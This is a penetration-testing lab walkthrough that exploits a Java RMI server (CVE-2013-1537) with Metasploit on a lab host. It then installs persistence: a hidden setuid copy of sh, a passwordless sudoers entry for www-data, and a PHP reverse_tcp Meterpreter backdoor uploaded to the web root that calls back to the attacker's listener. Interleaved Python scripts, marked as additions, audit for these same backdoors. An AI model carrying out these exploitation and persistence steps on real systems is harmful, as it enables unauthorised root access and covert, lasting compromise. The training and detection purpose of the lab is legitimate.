Lesson 6 Lab Notes
In this lab we will do the following:
- Update the java_rmi_server Metasploit module
- Exploit the RMI Server
- Create SUID backdoor
- Create SUDO backdoor
- Create PHP reverse_tcp Meterpreter Backdoor
- Obtain root
What is Java RMI?
The RMI protocol uses two other protocols for its on-the-wire format: Java Object Serialization and HTTP. The Java Remote Method Invocation (RMI) system allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine. One feature of the Java RMI protocol is the ability to load classes remotely. So, imagine a perfect storm where a particular version of the Java RMI Server, with a default insecure configuration, allows classes to be loaded from any remote (HTTP) URL, and further imagine that no authentication is required to load these Java classes.
What is SUID?
SUID (Set owner User ID upon execution) is a special type of file permission given to a file. Normally in Linux/Unix when a program runs, it inherits the access permissions of the logged-in user. SUID gives a user (e.g., www-data) temporary permission to run a program/file with the permissions of the file owner (e.g., root) rather than those of the user (e.g., www-data) who runs it. In other words, if an unprivileged user (e.g., www-data) executes a copied shell that is owned by root and has its SUID bit set, then the unprivileged user (e.g., www-data) will have an effective user ID (EUID) of root.
What is SUDO?
Sudo stands for "superuser do"; it allows a permitted user to execute a command as the superuser or another user, as specified in the /etc/sudoers file.
CVE Information:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1537
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, 6 Update 43 and earlier, and 5.0 Update 41 and earlier; and OpenJDK 6 and 7; allows remote attackers to affect confidentiality, integrity, and availability via vectors related to RMI. NOTE: the previous information is from the April 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to the default java.rmi.server.useCodebaseOnly setting of false, which allows remote attackers to perform "dynamic class downloading" and execute arbitrary code.
Module Information:
Rapid7 shows you which Metasploit module to use: https://www.rapid7.com/db/modules/exploit/multi/misc/java_rmi_server
And exploit-db shows you the code of the module: https://www.exploit-db.com/exploits/17535/
exploit/multi/misc/java_rmi_server
This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.
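The CVE entry above names the java.rmi.server.useCodebaseOnly property: when it is false, an RMI endpoint will fetch classes from a codebase URL supplied by the caller. As an added defender's-side example (not part of the lab notes or the Metasploit module), the following Python reads the output of ps -eo pid,user,args, picks out Java processes, and reports whether each one sets that property to true. The process lines in SAMPLE_PS are constructed; the note that the JVM default was false before Java 7 Update 21 is the Java release-note behaviour, not something the lab states.

```python
"""Audit running JVMs for the java.rmi.server.useCodebaseOnly setting.

Added example, not part of the lab notes. Input is the text of
`ps -eo pid,user,args`; the sample below is constructed.
"""
import shlex

# Constructed sample of `ps -eo pid,user,args` output.
SAMPLE_PS = """\
  PID USER     COMMAND
 1201 root     /usr/bin/java -Djava.rmi.server.useCodebaseOnly=false -jar /opt/app/rmi-server.jar
 1337 app      /usr/lib/jvm/java-7/bin/java -Djava.rmi.server.useCodebaseOnly=true -cp /opt/app/lib/* com.example.Registry
 2048 app      /usr/bin/java -Xmx512m -jar /opt/app/other.jar
 3001 www-data /usr/sbin/apache2 -k start
"""

PROP = "java.rmi.server.useCodebaseOnly"


def jvm_property(args, name):
    """Return the value of -D<name>=<value> in a JVM argument list, or None if unset."""
    prefix = "-D" + name + "="
    value = None
    for arg in args:
        if arg.startswith(prefix):
            value = arg[len(prefix):]      # the last occurrence wins, as in the JVM
    return value


def is_java(args):
    """True if the executable (ignoring its directory) is the java launcher."""
    exe = args[0].rsplit("/", 1)[-1] if args else ""
    return exe in ("java", "javaw")


def audit_ps(ps_text):
    """Return one finding dict per Java process found in the ps output."""
    findings = []
    for line in ps_text.splitlines():
        parts = line.split(None, 2)
        if len(parts) < 3 or not parts[0].isdigit():   # skips the header row
            continue
        pid, user, cmd = parts
        try:
            args = shlex.split(cmd)
        except ValueError:                  # unbalanced quotes in a command line
            args = cmd.split()
        if not is_java(args):
            continue
        value = jvm_property(args, PROP)
        if value is None:
            status = "unset (relies on the JVM default, which was false before Java 7u21)"
        elif value.lower() == "true":
            status = "ok"
        else:
            status = "remote codebase loading enabled"
        findings.append({"pid": int(pid), "user": user,
                         "useCodebaseOnly": value, "status": status})
    return findings


if __name__ == "__main__":
    for f in audit_ps(SAMPLE_PS):
        print("pid %(pid)d (%(user)s): useCodebaseOnly=%(useCodebaseOnly)s -> %(status)s" % f)
```

The check only sees properties passed on the command line; a value set through JAVA_TOOL_OPTIONS or System.setProperty() inside the application is invisible to ps, so treat "unset" as "verify by other means" rather than "safe". A JVM that needs RMI but not remote class loading should run with -Djava.rmi.server.useCodebaseOnly=true and, independently of that property, should not expose rmiregistry or rmid beyond the hosts that need them.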
Instructions:
Use mkdir to create the /var/tmp/RB and /opt/framework/msf3/modules/exploits/multi/misc directories, using the -p switch to suppress errors if a directory already exists.
mkdir -p /opt/framework/msf3/modules/exploits/multi/misc
mkdir -p /var/tmp/RB/
cd /var/tmp/RB/
Use wget to download the new java_rmi_server.rb module.
wget --no-check-certificate https://raw.githubusercontent.com/rapid7/metasploit-framework/ee9b1aa83a0010d6a960b8a11afe7efa5ffef873/modules/exploits/multi/misc/java_rmi_server.rb
Use cp to place the java_rmi_server.rb module into /opt/framework/msf3/modules/exploits/multi/misc/, then use ls -l to display the file's attributes.
cp java_rmi_server.rb /opt/framework/msf3/modules/exploits/multi/misc/
ls -l /opt/framework/msf3/modules/exploits/multi/misc/java_rmi_server.rb
Exploit the RMI Registry Server
Use the script command to create a typescript that stores all terminal output in the msfconsole_rmi.txt file.
script msfconsole_rmi.txt
msfconsole
search java_rmi
use exploit/multi/misc/java_rmi_server
show options
set RHOST 172.16.56.2
show options
exploit
Notice the Meterpreter session, opened for the first time! Type in help to show all the commands available in this Meterpreter session.
help
Got root?
ipconfig (displays the interfaces and their IP addresses)
getuid (shows the user the server is running as)
sysinfo (shows information about the remote system, such as Computer Name, OS and Meterpreter type)
Persistence 101
After gaining your first shell, you should immediately think about establishing a second, persistent connection in case the vulnerability is later patched. "Two is one, and one is none." The following section shows how to set up a multi handler, create a PHP backdoor, and set its payload.
background
sessions -l
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
show options
Both LHOST and LPORT are Required Settings
set LHOST 172.16.56.4
set LPORT 1099
Use set ExitOnSession false to stay in listening mode even if the PHP Meterpreter session dies. It is very possible that the PHP Meterpreter session will time out, but you can always reconnect. We are going to run this exploit in the background so it can continue to listen for incoming connections.
set ExitOnSession false
exploit -j
Set Up PHP Backdoor
use payload/php/meterpreter/reverse_tcp
show options
set LHOST 172.16.56.4
set LPORT 1099
show options
Generate PHP Backdoor
Use generate -t raw -f backdoor.php to generate a reverse_tcp Meterpreter PHP payload. The -t switch specifies the output format (e.g. raw, ruby, rb, perl and more) and the -f switch specifies the filename. The file is created in the directory from which msfconsole was started.
generate -t raw -f backdoor.php
pwd
ls -l backdoor.php
cat backdoor.php
The pwd command displays the current working directory; in my case the PHP file was created in the /var/tmp/RB directory. We then used cat to output the contents of the PHP file. Notice the comment opener /* in front of <?php (the file begins with /*<?php); we need to remove it so that our Apache web server executes the script. We also need to add a closing ?> PHP tag at the end of the file, or else it will error out.
Enable PHP Backdoor
In another terminal type in the following command -
gedit /var/tmp/RB/backdoor.php
Delete the leading /*, add ?> at the end, then save and close the PHP file.
Basic Web Server Interrogation
sessions -l
sessions -i 1
shell
ps -eaf | egrep '(http|apache)' | grep -v grep
Notice the webserver is Apache2 running as www-data.
Locate the Apache Root Directory
ls -l /etc | grep release
cat /etc/lsb-release
cd /var/www
ls -l
In most Linux distributions an /etc/*release file exists that contains the distribution name and version. We used grep to find the exact file name, then used cat to find out that the OS is Ubuntu and the version is 8.04.
Create SUID Backdoor
which sh
cp `which sh` .backdoor
ls -l .backdoor
chmod 4777 .backdoor
ls -l .backdoor
We used the command which sh to ask Linux to locate the path of the command interpreter (shell). Then we copied the file using cp, placing a dot in front of the new name so that it is hidden from a plain ls listing (dot-files are only shown with ls -a). ls -l .backdoor showed us the current file permissions, which were -rwxr-xr-x. Each permission character has a numeric value:
- read = 4
- write = 2
- execute = 1
- ' - ' = 0
So, the owner's (rwx) permissions are 7 (r=4 + w=2 + x=1). The group's (r-x) permissions are 5 (r=4 + x=1). The world's (r-x) permissions are 5 (r=4 + x=1). With these permissions, if a regular/unprivileged user (e.g., www-data) executes this shell, nothing special happens: it simply runs as www-data.
To overcome that, we used chmod 4777. The trailing 777 grants full permissions to the user (rwx), group (rwx) and world (rwx), and the leading 4 sets the SUID bit on the root-owned file, which allows any user (e.g., www-data) not only to execute the shell but to gain an EUID (effective user ID) of root.
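From the defender's side, a root-owned setuid copy of sh sitting in a web root is exactly what a periodic SUID audit exists to catch. The following Python is an added example (not part of the lab notes): decode_mode() renders a numeric mode the way ls -l does, so the 4777 above shows up as rwsrwxrwx, and find_suid() walks a tree and flags setuid/setgid regular files that have a hidden name, are world-writable, live outside the usual system directories (EXPECTED_DIRS is an assumption), or are byte-identical to a known system shell. demo() builds a constructed tree under a temporary directory that mimics /var/www/.backdoor.

```python
"""Find SUID/SGID files and flag the traits of a copied-shell backdoor.

Added example, not part of the lab notes. The tree scanned by demo() is
constructed under a temporary directory; on a real host run find_suid("/")
as root and compare the result with a known-good baseline.
"""
import hashlib
import os
import stat
import tempfile

# Where SUID binaries normally live on a Linux host (assumption used by the check).
EXPECTED_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/lib", "/usr/libexec")


def decode_mode(mode):
    """Render permission bits the way ls -l does: decode_mode(0o4777) -> 'rwsrwxrwx'."""
    flags = [stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR,
             stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP,
             stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH]
    out = [c if mode & f else "-" for f, c in zip(flags, "rwxrwxrwx")]
    # setuid/setgid/sticky replace the execute column: 's'/'t' if executable, 'S'/'T' if not
    if mode & stat.S_ISUID:
        out[2] = "s" if mode & stat.S_IXUSR else "S"
    if mode & stat.S_ISGID:
        out[5] = "s" if mode & stat.S_IXGRP else "S"
    if mode & stat.S_ISVTX:
        out[8] = "t" if mode & stat.S_IXOTH else "T"
    return "".join(out)


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_known_shells(paths=("/bin/sh", "/bin/bash", "/bin/dash")):
    """Map sha256 -> path for the system shells that exist, so copies can be recognised."""
    return {sha256_file(p): p for p in paths if os.path.isfile(p)}


def find_suid(root, known_shell_hashes=None):
    """Walk root and return one finding dict per setuid/setgid regular file."""
    known = hash_known_shells() if known_shell_hashes is None else known_shell_hashes
    findings = []
    for dirpath, _, filenames in os.walk(root):   # os.walk does not follow symlinked dirs
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)                # lstat: a symlink is not a setuid file
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                continue
            reasons = []
            if name.startswith("."):
                reasons.append("hidden file name")
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable setuid file")
            if not any(path.startswith(d + "/") for d in EXPECTED_DIRS):
                reasons.append("outside expected system directories")
            digest = sha256_file(path)
            if digest in known:
                reasons.append("byte-identical copy of %s" % known[digest])
            findings.append({"path": path, "mode": decode_mode(st.st_mode),
                             "uid": st.st_uid, "reasons": reasons})
    return findings


def demo():
    """Build a constructed tree that mimics the lab's /var/www/.backdoor and scan it."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    fake_shell = b"#!/bin/sh\n# constructed stand-in for a shell binary\n"
    backdoor = os.path.join(root, ".backdoor")
    with open(backdoor, "wb") as fh:
        fh.write(fake_shell)
    os.chmod(backdoor, 0o4777)                     # the lab's chmod 4777
    ordinary = os.path.join(root, "index.html")
    with open(ordinary, "wb") as fh:
        fh.write(b"<html></html>")
    os.chmod(ordinary, 0o644)
    # Constructed hash table standing in for hash_known_shells() on the real host.
    known = {hashlib.sha256(fake_shell).hexdigest(): "/bin/sh (simulated)"}
    return find_suid(root, known_shell_hashes=known)


if __name__ == "__main__":
    for f in demo():
        print(f["mode"], f["path"], "; ".join(f["reasons"]))
```

On a production host the same result can be approximated with find / -xdev -perm -4000 -type f, but the hash comparison is what turns "there is a setuid file in /var/www" into "this is a copy of /bin/sh", and comparing the list against a baseline taken at install time makes newly added entries stand out. Mounting web roots and /var/tmp with the nosuid option stops such a copy from granting root even when it is created.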
Create SUDO Backdoor
ps -eaf | grep apache2
ls -l /etc/sudoers
echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers
grep "www-data" /etc/sudoers
exit
ps -eaf displays all processes and is piped through grep to output only the processes that contain apache2. ls -l displays the attributes of the /etc/sudoers file, and echo >> appends www-data ALL=NOPASSWD: ALL to the end of /etc/sudoers. This gives the user www-data permissions equivalent to root: it can use the sudo command to run any command without supplying a password (ALL=NOPASSWD). Now that the sudo backdoor account is enabled, we exit the shell session to go back to the Meterpreter session.
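A line like www-data ALL=NOPASSWD: ALL is easy to spot once you parse the user specifications rather than eyeballing the file. The following Python is an added example (not part of the lab notes): parse_sudoers() splits each user specification into user, hosts, run-as, tags and commands, and audit_sudoers() reports passwordless grants, grants to service accounts (the SERVICE_ACCOUNTS set is an assumption about typical daemon users) and a sudoers file whose mode is not 0440. The sudoers text in SAMPLE_SUDOERS is constructed; on a real host read /etc/sudoers and /etc/sudoers.d/* as root and pass the text in.

```python
"""Audit sudoers text for grants like the lab's "www-data ALL=NOPASSWD: ALL".

Added example, not part of the lab notes. SAMPLE_SUDOERS is a constructed
sample; on a real host read /etc/sudoers and /etc/sudoers.d/* as root.
"""
import re

# Accounts that should never hold sudo rights (assumption: typical service users).
SERVICE_ACCOUNTS = {"www-data", "apache", "httpd", "nginx", "nobody", "mysql",
                    "postgres", "ftp", "tomcat", "daemon"}

# user  host=(runas) [TAG:] commands   -- the user specification line format
USER_SPEC = re.compile(
    r"^(?P<who>[^\s=]+)\s+(?P<hosts>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$"
)
TAG = re.compile(r"\b(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV)\s*:\s*")

SAMPLE_SUDOERS = """\
# constructed sample /etc/sudoers
Defaults        env_reset
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
www-data ALL=NOPASSWD: ALL
#includedir /etc/sudoers.d
"""


def parse_sudoers(text):
    """Return user-specification entries; Defaults, alias and include lines are skipped."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()        # drop comments (this also drops #include lines)
        if not line or line.startswith(("Defaults", "User_Alias", "Host_Alias",
                                        "Cmnd_Alias", "Runas_Alias", "@include")):
            continue
        m = USER_SPEC.match(line)
        if not m:
            continue
        rest = m.group("rest")
        tags = [t.upper() for t in TAG.findall(rest)]
        commands = [c.strip() for c in TAG.sub("", rest).split(",")]
        entries.append({"line": lineno, "who": m.group("who"), "hosts": m.group("hosts"),
                        "runas": m.group("runas") or "root",   # sudo's default run-as user
                        "tags": tags, "commands": commands})
    return entries


def audit_sudoers(text, file_mode=None):
    """Return findings (dicts with line, who, severity, issue) for risky entries."""
    findings = []
    if file_mode is not None and (file_mode & 0o777) != 0o440:
        findings.append({"line": 0, "who": "-", "severity": "high",
                         "issue": "sudoers mode is %o, expected 0440" % (file_mode & 0o777)})
    for e in parse_sudoers(text):
        if e["who"] in SERVICE_ACCOUNTS:
            findings.append({"line": e["line"], "who": e["who"], "severity": "high",
                             "issue": "service account granted sudo rights"})
        if "NOPASSWD" in e["tags"] and "ALL" in e["commands"]:
            findings.append({"line": e["line"], "who": e["who"], "severity": "high",
                             "issue": "passwordless sudo for ALL commands as %s" % e["runas"]})
        elif "NOPASSWD" in e["tags"]:
            findings.append({"line": e["line"], "who": e["who"], "severity": "medium",
                             "issue": "passwordless sudo for: %s" % ", ".join(e["commands"])})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS, file_mode=0o100440):
        print("line %(line)d %(who)s [%(severity)s] %(issue)s" % f)
```

Two complementary controls catch the append itself rather than its effect: a file-integrity or auditd watch on /etc/sudoers and /etc/sudoers.d, and the habit of only editing through visudo, whose -c flag also validates syntax, which an echo >> bypasses entirely.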
Upload PHP Backdoor
pwd
cd /var/www
upload backdoor.php .
ls
upload backdoor.php . is not a typo: the dot at the end is shorthand for the current working directory (here /var/www on the victim).
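A file appearing in /var/www that was never deployed is the defender's view of the upload step above. The following Python is an added example (not part of the lab notes): snapshot() records a hash manifest of the web root at deploy time, and audit_webroot() compares the tree against that baseline, reporting files that were added, changed or removed, and additionally flagging new or changed files that are owned by the web server account, are world-writable, have a hidden name, or carry a PHP open tag despite a non-PHP extension. demo() builds a constructed web root under a temporary directory and, as an assumption for the demonstration, uses the current process's uid as the web server uid.

```python
"""Detect files dropped into a web root, such as the lab's upload of backdoor.php.

Added example, not part of the lab notes. demo() builds a constructed web
root under a temporary directory; on a real host take the baseline at deploy
time, store it off-box, and run audit_webroot() on a schedule.
"""
import hashlib
import os
import stat
import tempfile

PHP_OPEN_TAG = b"<?php"
PHP_EXTENSIONS = (".php", ".phtml", ".php5", ".phar")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(webroot):
    """Map relative path -> sha256 for every regular file under webroot (the baseline)."""
    manifest = {}
    for dirpath, _, filenames in os.walk(webroot):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if stat.S_ISREG(os.lstat(path).st_mode):
                manifest[os.path.relpath(path, webroot)] = sha256_file(path)
    return manifest


def php_code_in_non_php_file(path):
    """True if a file with a non-PHP extension contains a PHP open tag in its first 64 KiB."""
    if path.lower().endswith(PHP_EXTENSIONS):
        return False
    with open(path, "rb") as fh:
        return PHP_OPEN_TAG in fh.read(65536)


def audit_webroot(webroot, baseline, web_server_uid=None):
    """Compare the tree with the baseline and return anomalies as a list of dicts."""
    current = snapshot(webroot)
    findings = []
    for rel in sorted(set(current) | set(baseline)):
        reasons = []
        if rel not in baseline:
            reasons.append("not in baseline")
        elif rel not in current:
            reasons.append("removed since baseline")
        elif current[rel] != baseline[rel]:
            reasons.append("content changed since baseline")
        new_or_changed = bool(reasons) and rel in current
        if rel in current:
            st = os.lstat(os.path.join(webroot, rel))
            # Ownership by the web user only matters for files that were not deployed as-is.
            if new_or_changed and web_server_uid is not None and st.st_uid == web_server_uid:
                reasons.append("owned by the web server user")
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if os.path.basename(rel).startswith("."):
                reasons.append("hidden file name")
            if php_code_in_non_php_file(os.path.join(webroot, rel)):
                reasons.append("PHP open tag inside a non-PHP file")
        if reasons:
            findings.append({"path": rel, "reasons": reasons})
    return findings


def demo():
    """Constructed web root: deploy index.php, take the baseline, then drop extra files."""
    webroot = tempfile.mkdtemp(prefix="webroot-")
    with open(os.path.join(webroot, "index.php"), "wb") as fh:
        fh.write(b"<?php echo 'constructed site'; ?>\n")
    baseline = snapshot(webroot)
    # Constructed stand-ins for files written after deployment (no real payload content).
    with open(os.path.join(webroot, "backdoor.php"), "wb") as fh:
        fh.write(b"<?php /* constructed fixture, not a payload */ echo 'x'; ?>\n")
    with open(os.path.join(webroot, "logo.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff" + b"<?php echo 'constructed fixture'; ?>")
    with open(os.path.join(webroot, "index.php"), "ab") as fh:
        fh.write(b"<?php /* constructed: appended content */ ?>\n")
    # Assumption for the demo: our own uid plays the role of the web server's uid.
    return audit_webroot(webroot, baseline, web_server_uid=os.getuid())


if __name__ == "__main__":
    for f in demo():
        print(f["path"], "->", "; ".join(f["reasons"]))
```

The ownership check reflects how the file got there: a Meterpreter running inside Apache writes as www-data, whereas deployed content is normally owned by a deployment user and only readable by the web server. Keeping the web root read-only for www-data (uploads, if any, in a separate directory with PHP execution disabled) removes the write path that both this upload and the earlier SUID copy rely on.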
Establishing A Second Session
background
Click on the Firefox icon and type in -
http://172.16.56.2/backdoor.php
Click back to your Terminal window and verify that the persistent PHP connection from the victim to your Kali VM succeeded by typing -
sessions -l
sessions -i 2
Replace (2) with your php meterpreter session ID.
Obtain root with SUID Backdoor
shell
pwd
./.backdoor
id
whoami
./.backdoor -p
id
whoami
./.backdoor was used to execute our backdoor sh shell, followed by the id command to view the real and effective user and group IDs of the process.
The shell did not give us root because the euid reported by id was not root: a bash-style shell that starts with an effective UID different from its real UID resets the effective UID back to the real one unless told not to.
That is why we ran ./.backdoor with the -p switch, which keeps the shell privileged, followed by the id command to verify that the euid (effective user ID) is now root.
Re-Establishing PHP Meterpreter Session
exit (to exit the (backdoor -p) privileged shell)
exit (to exit the backdoor non-privileged shell)
exit (to exit the command shell executed from the meterpreter session)
exit (to exit the PHP Meterpreter session)
sessions -l
Notice that Meterpreter session #2 died but the java_rmi Meterpreter session #1 still exists. Remember that earlier we set ExitOnSession false, which allows the multi handler to keep listening despite exited, lost, or killed PHP Meterpreter sessions.
Click on the Firefox Window in the taskbar.
Click on the reload icon.
Click on back to your terminal and type in
sessions -l
Obtain your php/meterpreter ID
sessions -i 3
Replace (3) with your php/meterpreter ID.
That's all for now, but you can click the link below if you want to dive deeper into this topic, such as creating backdoor sudo accounts, vim exploits, or forensic capture.
http://computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson5/index.html